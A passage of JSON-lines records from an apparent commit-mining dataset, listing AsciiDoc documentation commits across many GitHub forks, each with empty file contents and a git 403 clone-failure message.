rch,caengcjd\/elasticsearch,szroland\/elasticsearch,KimTaehee\/elasticsearch,himanshuag\/elasticsearch,trangvh\/elasticsearch,lmtwga\/elasticsearch,luiseduardohdbackup\/elasticsearch,zkidkid\/elasticsearch,huanzhong\/elasticsearch,javachengwc\/elasticsearch,tahaemin\/elasticsearch,wayeast\/elasticsearch,vrkansagara\/elasticsearch,koxa29\/elasticsearch,HarishAtGitHub\/elasticsearch,xingguang2013\/elasticsearch,cnfire\/elasticsearch-1,areek\/elasticsearch,knight1128\/elasticsearch,MaineC\/elasticsearch,djschny\/elasticsearch,easonC\/elasticsearch,infusionsoft\/elasticsearch,koxa29\/elasticsearch,rmuir\/elasticsearch,Kakakakakku\/elasticsearch,zhiqinghuang\/elasticsearch,jeteve\/elasticsearch,EasonYi\/elasticsearch,mjhennig\/elasticsearch,infusionsoft\/elasticsearch,mcku\/elasticsearch,umeshdangat\/elasticsearch,Asimov4\/elasticsearch,MetSystem\/elasticsearch,djschny\/elasticsearch,abhijitiitr\/es,gfyoung\/elasticsearch,MisterAndersen\/elasticsearch,wenpos\/elasticsearch,phani546\/elasticsearch,alexkuk\/elasticsearch,snikch\/elasticsearch,drewr\/elasticsearch,AleksKochev\/elasticsearch,winstonewert\/elasticsearch,amit-shar\/elasticsearch,umeshdangat\/elasticsearch,zeroctu\/elasticsearch,C-Bish\/elasticsearch,vvcephei\/elasticsearch,polyfractal\/elasticsearch,nknize\/elasticsearch,kcompher\/elasticsearch,tsohil\/elasticsearch,sauravmondallive\/elasticsearch,petabytedata\/elasticsearch,Siddartha07\/elasticsearch,YosuaMichael\/elasticsearch,Widen\/elasticsearch,18098924759\/elasticsearch,adrianbk\/elasticsearch,xuzha\/elasticsearch,pranavraman\/elasticsearch,onegambler\/elasticsearch,KimTaehee\/elasticsearch,golubev\/elasticsearch,palecur\/elasticsearch,slavau\/elasticsearch,tkssharma\/elasticsearch,robin13\/elasticsearch,18098924759\/elasticsearch,JervyShi\/elasticsearch,khiraiwa\/elasticsearch,onegambler\/elasticsearch,mm0\/elasticsearch,Widen\/elasticsearch,Ansh90\/elasticsearch,mkis-\/elasticsearch,djschny\/elasticsearch,hanswang\/elasticsearch,wbowling\/elasticsearch,kubum\/elasticsearch,vingupta3\/elasticsearch,andrestc\/elasticsearch,episerver\/elasticsearch,ulkas\/elasticsearch,elasticdog\/elasticsearch,achow\/elasticsearch,nellicus\/elasticsearch,vroyer\/elassandra,vvcephei\/elasticsearch,mortonsykes\/elasticsearch,humandb\/elasticsearch,weipinghe\/elasticsearch,fubuki\/elasticsearch,franklanganke\/elasticsearch,wbowling\/elasticsearch,hydro2k\/elasticsearch,camilojd\/elasticsearch,areek\/elasticsearch,jpountz\/elasticsearch,dongjoon-hyun\/elasticsearch,mrorii\/elasticsearch,fforbeck\/elasticsearch,YosuaMichael\/elasticsearch,strapdata\/elassandra5-rc,overcome\/elasticsearch,mnylen\/elasticsearch,golubev\/elasticsearch,jbertouch\/elasticsearch,glefloch\/elasticsearch,MjAbuz\/elasticsearch,mjason3\/elasticsearch,yongminxia\/elasticsearch,ivansun1010\/elasticsearch,djschny\/elasticsearch,ImpressTV\/elasticsearch,sneivandt\/elasticsearch,lmtwga\/elasticsearch,EasonYi\/elasticsearch,thecocce\/elasticsearch,jsgao0\/elasticsearch,AndreKR\/elasticsearch,jimhooker2002\/elasticsearch,wbowling\/elasticsearch,vvcephei\/elasticsearch,strapdata\/elassandra-test,Shepard1212\/elasticsearch,KimTaehee\/elasticsearch,gingerwizard\/elasticsearch,Ansh90\/elasticsearch,tebriel\/elasticsearch,ulkas\/elasticsearch,StefanGor\/elasticsearch,scottsom\/elasticsearch,mm0\/elasticsearch,alexkuk\/elasticsearch,NBSW\/elasticsearch,easonC\/elasticsearch,mrorii\/elasticsearch,HarishAtGitHub\/elasticsearch,mute\/elasticsearch,kevinkluge\/elasticsearch,masaruh\/elasticsearch,nknize\/elasticsearch,knight1128\/elasticsearch,jprante\/elasticsearch,ydsakyclguozi\/elasticsearch,nellicus\/elasticsearch,shreejay\/elasticsearch,janmejay\/elasticsearch,pablocastro\/elasticsearch,Helen-Zhao\/elasticsearch,glefloch\/elasticsearch,hydro2k\/elasticsearch,ulkas\/elasticsearch,koxa29\/elasticsearch,queirozfcom\/elasticsearch,kaneshin\/elasticsearch,ckclark\/elasticsearch,chirilo\/elasticsearch,infusionsoft\/elasticsearch,masterweb121\/elasticsearch,YosuaMichael\/elasticsearch,vingupta3\/elasticsearch,fekaputra\/elasticsearch,MichaelLiZhou\/elasticsearch,kevinkluge\/elasticsearch,kalimatas\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,pablocastro\/elasticsearch,loconsolutions\/elasticsearch,likaiwalkman\/elasticsearch,andrestc\/elasticsearch,SergVro\/elasticsearch,nomoa\/elasticsearch,jprante\/elasticsearch,camilojd\/elasticsearch,pozhidaevak\/elasticsearch,andrestc\/elasticsearch,hechunwen\/elasticsearch,awislowski\/elasticsearch,fooljohnny\/elasticsearch,SergVro\/elasticsearch,iacdingping\/elasticsearch,mcku\/elasticsearch,ThalaivaStars\/OrgRepo1,bawse\/elasticsearch,wangtuo\/elasticsearch,vingupta3\/elasticsearch,lzo\/elasticsearch-1,NBSW\/elasticsearch,marcuswr\/elasticsearch-dateline,codebunt\/elasticsearch,golubev\/elasticsearch,TonyChai24\/ESSource,raishiv\/elasticsearch,spiegela\/elasticsearch,andrestc\/elasticsearch,rento19962\/elasticsearch,marcuswr\/elasticsearch-dateline,cnfire\/elasticsearch-1,mapr\/elasticsearch,scorpionvicky\/elasticsearch,fernandozhu\/elasticsearch,caengcjd\/elasticsearch,dylan8902\/elasticsearch,amit-shar\/elasticsearch,opendatasoft\/elasticsearch,opendatasoft\/elasticsearch,kevinkluge\/elasticsearch,markllama\/elasticsearch,HarishAtGitHub\/elasticsearch,rhoml\/elasticsearch,polyfractal\/elasticsearch,jw0201\/elastic,jprante\/elasticsearch,F0lha\/elasticsearch,F0lha\/elasticsearch,PhaedrusTheGreek\/elasticsearch,springning\/elasticsearch,kalburgimanjunath\/elasticsearch,jeteve\/elasticsearch,lzo\/elasticsearch-1,sarwarbhuiyan\/elasticsearch,kalimatas\/elasticsearch,ricardocerq\/elasticsearch,kunallimaye\/elasticsearch,kimimj\/elasticsearch,mortonsykes\/elasticsearch,maddin2016\/elasticsearch,IanvsPoplicola\/elasticsearch,F0lha\/elasticsearch,Shekharrajak\/elasticsearch,Brijeshrpatel9\/elasticsearch,sarwarbhuiyan\/elasticsearch,dongjoon-hyun\/elasticsearch,PhaedrusTheGreek\/elasticsearch,trangvh\/elasticsearch,iacdingping\/elasticsearch,opendatasoft\/elasticsearch,sreeramjayan\/elasticsearch,JSCooke\/elasticsearch,yynil\/elasticsearch,bestwpw\/elasticsearch,Fsero\/elasticsearch,strapdata\/elassandra,aglne\/elasticsearch,s1monw\/elasticsearch,rajanm\/elasticsearch,ouyangkongtong\/elasticsearch,jbertouch\/elasticsearch,loconsolutions\/elasticsearch,thecocce\/elasticsearch,wimvds\/elasticsearch,18098924759\/elasticsearch,Brijeshrpatel9\/elasticsearch,markharwood\/elasticsearch,heng4fun\/elasticsearch,pablocastro\/elasticsearch,himanshuag\/elasticsearch,hydro2k\/elasticsearch,TonyChai24\/ESSource,mohit\/elasticsearch,abhijitiitr\/es,shreejay\/elasticsearch,uschindler\/elasticsearch,tsohil\/elasticsearch,episerver\/elasticsearch,SergVro\/elasticsearch,khiraiwa\/elasticsearch,codebunt\/elasticsearch,tcucchietti\/elasticsearch,clintongormley\/elasticsearch,tkssharma\/elasticsearch,yanjunh\/elasticsearch,VukDukic\/elasticsearch,chrismwendt\/elasticsearch,ESamir\/elasticsearch,marcuswr\/elasticsearch-dateline,mjason3\/elasticsearch,mcku\/elasticsearch,VukDukic\/elasticsearch,skearns64\/elasticsearch,luiseduardohdbackup\/elasticsearch,glefloch\/elasticsearch,kingaj\/elasticsearch,IanvsPoplicola\/elasticsearch,Charlesdong\/elasticsearch,strapdata\/elassandra-test,lchennup\/elasticsearch,IanvsPoplicola\/elasticsearch,humandb\/elasticsearch,fekaputra\/elasticsearch,codebunt\/elasticsearch,s1monw\/elasticsearch,mapr\/elasticsearch,Widen\/elasticsearch,wuranbo\/elasticsearch,pritishppai\/elasticsearch,Widen\/elasticsearch,pozhidaevak\/elasticsearch,wangyuxue\/elasticsearch,avikurapati\/elasticsearch,lightslife\/elasticsearch,tkssharma\/elasticsearch,martinstuga\/elasticsearch,vvcephei\/elasticsearch,mnylen\/elasticsearch,masterweb121\/elasticsearch,schonfeld\/elasticsearch,fubuki\/elasticsearch,petmit\/elasticsearch,djschny\/elasticsearch,aparo\/elasticsearch,apepper\/elasticsearch,KimTaehee\/elasticsearch,iantruslove\/elasticsearch,pablocastro\/elasticsearch,TonyChai24\/ESSource,Stacey-Gammon\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,LewayneNaidoo\/elasticsearch,mapr\/elasticsearch,AshishThakur\/elasticsearch,ImpressTV\/elasticsearch,wittyameta\/elasticsearch,schonfeld\/elasticsearch,luiseduardohdbackup\/elasticsearch,springning\/elasticsearch,yongminxia\/elasticsearch,lightslife\/elasticsearch,awislowski\/elasticsearch,hanswang\/elasticsearch,Flipkart\/elasticsearch,sarwarbhuiyan\/elasticsearch,mikemccand\/elasticsearch,s1monw\/elasticsearch,YosuaMichael\/elasticsearch,nrkkalyan\/elasticsearch,luiseduardohdbackup\/elasticsearch,springning\/elasticsearch,tsohil\/elasticsearch,brandonkearby\/elasticsearch,diendt\/elasticsearch,davidvgalbraith\/elasticsearch,pranavraman\/elasticsearch,wangtuo\/elasticsearch,diendt\/elasticsearch,HarishAtGitHub\/elasticsearch,onegambler\/elasticsearch,AshishThakur\/elasticsearch,girirajsharma\/elasticsearch,hydro2k\/elasticsearch,markharwood\/elasticsearch,Collaborne\/elasticsearch,Clairebi\/ElasticsearchClone,brwe\/elasticsearch,kingaj\/elasticsearch,pranavraman\/elasticsearch,adrianbk\/elasticsearch,onegambler\/elasticsearch,opendatasoft\/elasticsearch,Charlesdong\/elasticsearch,Ansh90\/elasticsearch,spiegela\/elasticsearch,nezirus\/elasticsearch,a2lin\/elasticsearch,wenpos\/elasticsearch,kcompher\/elasticsearch,feiqitian\/elasticsearch,jeteve\/elasticsearch,gingerwizard\/elasticsearch,TonyChai24\/ESSource,truemped\/elasticsearch,amaliujia\/elasticsearch,jchampion\/elasticsearch,masaruh\/elasticsearch,vingupta3\/elasticsearch,Brijeshrpatel9\/elasticsearch,markllama\/elasticsearch,kimimj\/elasticsearch,elancom\/elasticsearch,linglaiyao1314\/elasticsearch,njlawton\/elasticsearch,ZTE-PaaS\/elasticsearch,pritishppai\/elasticsearch,snikch\/elasticsearch,zeroctu\/elasticsearch,mbrukman\/elasticsearch,Collaborne\/elasticsearch,Siddartha07\/elasticsearch,schonfeld\/elasticsearch,sdauletau\/elasticsearch,humandb\/elasticsearch,jimhooker2002\/elasticsearch,maddin2016\/elasticsearch,njlawton\/elasticsearch,njlawton\/elasticsearch,cwurm\/elasticsearch,mikemccand\/elasticsearch,snikch\/elasticsearch,dpursehouse\/elasticsearch,kubum\/elasticsearch,Clairebi\/ElasticsearchClone,hafkensite\/elasticsearch,petabytedata\/elasticsearch,huanzhong\/elasticsearch,humandb\/elasticsearch,bawse\/elasticsearch,caengcjd\/elasticsearch,kingaj\/elasticsearch,infusionsoft\/elasticsearch,huanzhong\/elasticsearch,iacdingping\/elasticsearch,girirajsharma\/elasticsearch,yuy168\/elasticsearch,xingguang2013\/elasticsearch,C-Bish\/elasticsearch,queirozfcom\/elasticsearch,zeroctu\/elasticsearch,i-am-Nathan\/elasticsearch,kcompher\/elasticsearch,avikurapati\/elasticsearch,pranavraman\/elasticsearch,Rygbee\/elasticsearch,alexbrasetvik\/elasticsearch,kunallimaye\/elasticsearch,janmejay\/elasticsearch,masterweb121\/elasticsearch,rmuir\/elasticsearch,dataduke\/elasticsearch,iantruslove\/elasticsearch,alexkuk\/elasticsearch,chrismwendt\/elasticsearch,dpursehouse\/elasticsearch,chirilo\/elasticsearch,humandb\/elasticsearch,ckclark\/elasticsearch,myelin\/elasticsearch,fooljohnny\/elasticsearch,jeteve\/elasticsearch,ckclark\/elasticsearch,Fsero\/elasticsearch,anti-social\/elasticsearch,pritishppai\/elasticsearch,acchen97\/elasticsearch,caengcjd\/elasticsearch,drewr\/elasticsearch,aparo\/elasticsearch,awislowski\/elasticsearch,socialrank\/elasticsearch,gmarz\/elasticsearch,masaruh\/elasticsearch,MjAbuz\/elasticsearch,Flipkart\/elasticsearch,mjason3\/elasticsearch","old_file":"docs\/reference\/index-modules.asciidoc","new_file":"docs\/reference\/index-modules.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c2f2a4542a31ebca502c50ba3a7c95de610df875","subject":"data\/lib: added online readme","message":"data\/lib: added online readme\n","repos":"vdmeer\/skb","old_file":"data\/library\/online\/continuous\/README.asciidoc","new_file":"data\/library\/online\/continuous\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vdmeer\/skb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"22d36791e985d0e78f6215bb46c6cd18bd7b719c","subject":"added .yml extension to style guide.","message":"added .yml extension to style guide.\n","repos":"ttindell2\/openshift-ansible,EricMountain-1A\/openshift-ansible,sdodson\/openshift-ansible,mmahut\/openshift-ansible,carlosthe19916\/openshift-ansible,sosiouxme\/openshift-ansible,rjhowe\/openshift-ansible,twiest\/openshift-ansible,gburges\/openshift-ansible,ewolinetz\/openshift-ansible,ewolinetz\/openshift-ansible,rharrison10\/openshift-ansible,maxamillion\/openshift-ansible,menren\/openshift-ansible,rjhowe\/openshift-ansible,spinolacastro\/openshift-ansible,christian-posta\/openshift-ansible,johnjelinek\/openshift-ansible,thoraxe\/openshift-ansible,jwhonce\/openshift-ansible,carlosthe19916\/openshift-ansible,carlosthe19916\/openshift-ansible,robotmaxtron\/openshift-ansible,stenwt\/openshift-ansible,abutcher\/openshift-ansible,git001\/openshift-ansible,mmahut\/openshift-ansible,jwhonce\/openshift-ansible,bparees\/openshift-ansible,zhiwliu\/openshift-ansible,Jandersolutions\/openshift-ansible,detiber\/openshift-ansible,mwoodson\/openshift-ansible,abutcher\/openshift-ansible,miminar\/openshift-ansible,wbrefvem\/openshift-ansible,mmahut\/openshift-ansible,abutcher\/openshift-ansible,DG-i\/openshift-ansible,johnjelinek\/openshift-ansible,nak3\/openshift-ansible,bparees\/openshift-ansible,akram\/openshift-ansible,miminar\/openshift-ansible,gburges\/openshift-ansible,Jandersolutions\/openshift-ansible,abutcher\/openshift-ansible,cgwalters\/openshift-ansible,ttindell2\/openshift-ansible,twiest\/openshift-ansible,bashburn\/openshift-ansible,jwhonce\/openshift-ansible,aveshagarwal\/openshift-ansible,BlueShells\/openshift-ansible,christian-posta\/openshift-ansible,LutzLange\/openshift-ansible,johnjelinek\/openshift-ansible,brenton\/openshift-ansible,jdamick\/openshift-ansible,jaryn\/openshift-ansible,akubicharm\/openshift-ansible,christian-posta\/openshift-ansible,thoraxe\/openshift-ansible,miminar\/openshift-ansible,tagliateller\/openshift-ansible,ewolinetz\/openshift-ansible,base2Services\/openshift-ansible,mwoodson\/openshift-ansible,detiber\/openshift-ansible,henderb\/openshift-ansible,detiber\/openshift-ansible,jaryn\/openshift-ansible,LutzLange\/openshift-ansible,wbrefvem\/openshift-ansible,maxamillion\/openshift-ansible,kwoodson\/openshift-ansible,Jandersoft\/openshift-ansible,bashburn\/openshift-ansible,ewolinetz\/openshift-ansible,sborenst\/openshift-ansible,stenwt\/openshift-ansible,tagliateller\/openshift-ansible,miminar\/openshift-ansible,anpingli\/openshift-ansible,xuant\/openshift-ansible,ibotty\/openshift-ansible,aweiteka\/openshift-ansible,sborenst\/openshift-ansible,aweiteka\/openshift-ansible,akubicharm\/openshift-ansible,Jandersoft\/openshift-ansible,sosiouxme\/openshift-ansible,brenton\/openshift-ansible,openshift\/openshift-ansible,DG-i\/openshift-ansible,Jandersolutions\/openshift-ansible,liggitt\/openshift-ansible,pkdevbox\/openshift-ansible,liggitt\/openshift-ansible,ibotty\/openshift-ansible,markllama\/openshift-ansible,thoraxe\/openshift-ansible,EricMountain-1A\/openshift-ansible,spinolacastro\/openshift-ansible,Jandersoft\/openshift-ansible,aveshagarwal\/openshift-ansible,twiest\/openshift-ansible,sosiouxme\/openshift-ansible,rjhowe\/openshift-ansible,DG-i\/openshift-ansible,mmahut\/openshift-ansible,tomassedovic\/openshift-ansible,nhr\/openshift-ansible,git001\/openshift-ansible,rharrison10\/openshift-ansible,zhiwliu\/openshift-ansible,attakei\/openshift-ansible,attakei\/openshift-ansible,VeerMuchandi\/openshift-ansible,sosiouxme\/openshift-ansible,liggitt\/openshift-ansible,akubicharm\/openshift-ansible,tagliateller\/openshift-ansible,sborenst\/openshift-ansible,LutzLange\/openshift-ansible,jimmidyson\/openshift-ansible,quantiply-fork\/openshift-ansible,DG-i\/openshift-ansible,thoraxe\/openshift-ansible,detiber\/openshift-ansible,BlueShells\/openshift-ansible,kwoodson\/openshift-ansible,markllama\/openshift-ansible,Maarc\/openshift-ansible,attakei\/openshift-ansible,jimmidyson\/openshift-ansible,zhiwliu\/openshift-ansible,tagliateller\/openshift-ansible,nhr\/openshift-ansible,wshearn\/openshift-ansible,wbrefvem\/openshift-ansible,xuant\/openshift-ansible,zhiwliu\/openshift-ansible,tagliateller\/openshift-ansible,git001\/openshift-ansible,ibotty\/openshift-ansible,henderb\/openshift-ansible,rhdedgar\/openshift-ansible,markllama\/openshift-ansible,ttindell2\/openshift-ansible,maxamillion\/openshift-ansible,akubicharm\/openshift-ansible,anpingli\/openshift-ansible,mmahut\/openshift-ansible,BlueShells\/openshift-ansible,sdodson\/openshift-ansible,cgwalters\/openshift-ansible,twiest\/openshift-ansible,menren\/openshift-ansible,markllama\/openshift-ansible,nak3\/openshift-ansible,jwhonce\/openshift-ansible,rhdedgar\/openshift-ansible,abutcher\/openshift-ansible,miminar\/openshift-ansible,markllama\/openshift-ansible,openshift\/openshift-ansible,sdodson\/openshift-ansible,xuant\/openshift-ansible,akram\/openshift-ansible,Maarc\/openshift-ansible,tomassedovic\/openshift-ansible,stenwt\/openshift-ansible,sdodson\/openshift-ansible,twiest\/openshift-ansible,quantiply-fork\/openshift-ansible,aveshagarwal\/openshift-ansible,base2Services\/openshift-ansible,EricMountain-1A\/openshift-ansible,pkdevbox\/openshift-ansible,maxamillion\/openshift-ansible,VeerMuchandi\/openshift-ansible,cgwalters\/openshift-ansible,rjhowe\/openshift-ansible,VeerMuchandi\/openshift-ansible,wbrefvem\/openshift-ansible,liggitt\/openshift-ansible,wbrefvem\/openshift-ansible,tomassedovic\/openshift-ansible,EricMountain-1A\/openshift-ansible,base2Services\/openshift-ansible,wshearn\/openshift-ansible,maxamillion\/openshift-ansible,jimmidyson\/openshift-ansible,robotmaxtron\/openshift-ansible,liggitt\/openshift-ansible,sdodson\/openshift-ansible,bashburn\/openshift-ansible,aveshagarwal\/openshift-ansible,ewolinetz\/openshift-ansible,ttindell2\/openshift-ansible,jaryn\/openshift-ansible,zhiwliu\/openshift-ansible,brenton\/openshift-ansible,jdamick\/openshift-ansible,akubicharm\/openshift-ansible,quantiply-fork\/openshift-ansible,jwhonce\/openshift-ansible,henderb\/openshift-ansible,Maarc\/openshift-ansible,EricMountain-1A\/openshift-ansible,aweiteka\/openshift-ansible,jdamick\/openshift-ansible,git001\/openshift-ansible,detiber\/openshift-ansible,ttindell2\/openshift-ansible,rjhowe\/openshift-ansible,sosiouxme\/openshift-ansible,menren\/openshift-ansible,aveshagarwal\/openshift-ansible,pkdevbox\/openshift-ansible,nhr\/openshift-ansible","old_file":"docs\/style_guide.adoc","new_file":"docs\/style_guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/maxamillion\/openshift-ansible.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e9185a63b69779f4a1effb273a7dcee78318a7a1","subject":"Improve install docs","message":"Improve install docs\n","repos":"stefanogualdi\/grails-ckeditor,stefanogualdi\/grails-ckeditor,stefanogualdi\/grails-ckeditor,stefanogualdi\/grails-ckeditor,stefanogualdi\/grails-ckeditor","old_file":"src\/docs\/gettingStarted\/installation.adoc","new_file":"src\/docs\/gettingStarted\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stefanogualdi\/grails-ckeditor.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bb44f3be916fcc5eb497ddf04807d4f4c76befc1","subject":"Draft of mounting local volumes","message":"Draft of mounting local volumes","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/mounting-local-volumes.adoc","new_file":"modules\/mounting-local-volumes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vikram-redhat\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"55e50d222a8f8ddbfb58e421f67148e39a907e74","subject":"completed ataglance section","message":"completed ataglance section\n\nSigned-off-by: Dan Mack <f52cae7d677fd8a83ac7cc4406c1d073a69a7b23@macktronics.com>\n","repos":"danmack\/resume","old_file":"ataglance.adoc","new_file":"ataglance.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danmack\/resume.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d976e975431fc4d57cf0e3e1f92e80a8633f800b","subject":"Update 2018-08-27-G-A-S-slack-birthday-channel.adoc","message":"Update 2018-08-27-G-A-S-slack-birthday-channel.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-27-G-A-S-slack-birthday-channel.adoc","new_file":"_posts\/2018-08-27-G-A-S-slack-birthday-channel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"99795bc0547716750390b1f28df26ecd16f2d49d","subject":"Update 2017-11-19-.adoc","message":"Update 2017-11-19-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-19-.adoc","new_file":"_posts\/2017-11-19-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"341d2b58649f0b9e558ab45ff7a59931a24c300e","subject":"Update 2019-03-10-.adoc","message":"Update 2019-03-10-.adoc","repos":"cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io","old_file":"_posts\/2019-03-10-.adoc","new_file":"_posts\/2019-03-10-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cncgl\/cncgl.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80ded71da0425b54b256e3a633a89484fc29db62","subject":"Change transport from \"tcp\" to \"inet\"","message":"Change transport from \"tcp\" to \"inet\"","repos":"Fruneau\/pfixtools,Fruneau\/pfixtools","old_file":"postlicyd\/postlicyd.conf-srs.asciidoc","new_file":"postlicyd\/postlicyd.conf-srs.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Fruneau\/pfixtools.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"3e67ce1e6a707044426f5beb19560752892bca22","subject":"Update ipython_setup.adoc","message":"Update ipython_setup.adoc","repos":"lowcloudnine\/singularity-spark,lowcloudnine\/singularity-spark","old_file":"docs\/ipython_setup.adoc","new_file":"docs\/ipython_setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lowcloudnine\/singularity-spark.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"18a9085f23eab13d298433993c5f664a19ea35f8","subject":"Issue #4 Types of effort.","message":"Issue #4 Types of effort.\n","repos":"uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/osis","old_file":"doc\/development\/software-process.adoc","new_file":"doc\/development\/software-process.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"7223efe4a788fded2ad5bd30a726eec504f69c6c","subject":"Update 2016-11-18-Sass-Awesome.adoc","message":"Update 2016-11-18-Sass-Awesome.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-18-Sass-Awesome.adoc","new_file":"_posts\/2016-11-18-Sass-Awesome.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf8707f899ff36ecdf667dad53913c0706da7915","subject":"y2b create post This Cool, Cheap Gadget","message":"y2b create post This Cool, Cheap Gadget","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-05-21-This-Cool-Cheap-Gadget.adoc","new_file":"_posts\/2016-05-21-This-Cool-Cheap-Gadget.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f7d3f5e9d70c3aaabd570c94463c69a54bd8ff9d","subject":"Update 2016-11-13-221100-Sunday.adoc","message":"Update 2016-11-13-221100-Sunday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-13-221100-Sunday.adoc","new_file":"_posts\/2016-11-13-221100-Sunday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ae5f48b5360c0901c9b83f1ec1dcebc8576f6df","subject":"Update 2017-07-17-fallen-chinar.adoc","message":"Update 2017-07-17-fallen-chinar.adoc","repos":"TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io","old_file":"_posts\/2017-07-17-fallen-chinar.adoc","new_file":"_posts\/2017-07-17-fallen-chinar.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheStudentsOutpost\/TheStudentsOutpost.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"27a326442b64745cb116b44688df12da57cb0d08","subject":"Update proper profiles on readme","message":"Update proper profiles on readme\n","repos":"jsanda\/hawkular-alerts,lucasponce\/hawkular-alerts,hawkular\/hawkular-alerts,jpkrohling\/hawkular-alerts,lucasponce\/hawkular-alerts,jpkrohling\/hawkular-alerts,lucasponce\/hawkular-alerts,tsegismont\/hawkular-alerts,tsegismont\/hawkular-alerts,hawkular\/hawkular-alerts,hawkular\/hawkular-alerts,jsanda\/hawkular-alerts,hawkular\/hawkular-alerts,lucasponce\/hawkular-alerts","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lucasponce\/hawkular-alerts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"274a5ee70241feef2a95f4287959ac25b2c388a0","subject":"Sync docs","message":"Sync docs\n","repos":"spring-cloud\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 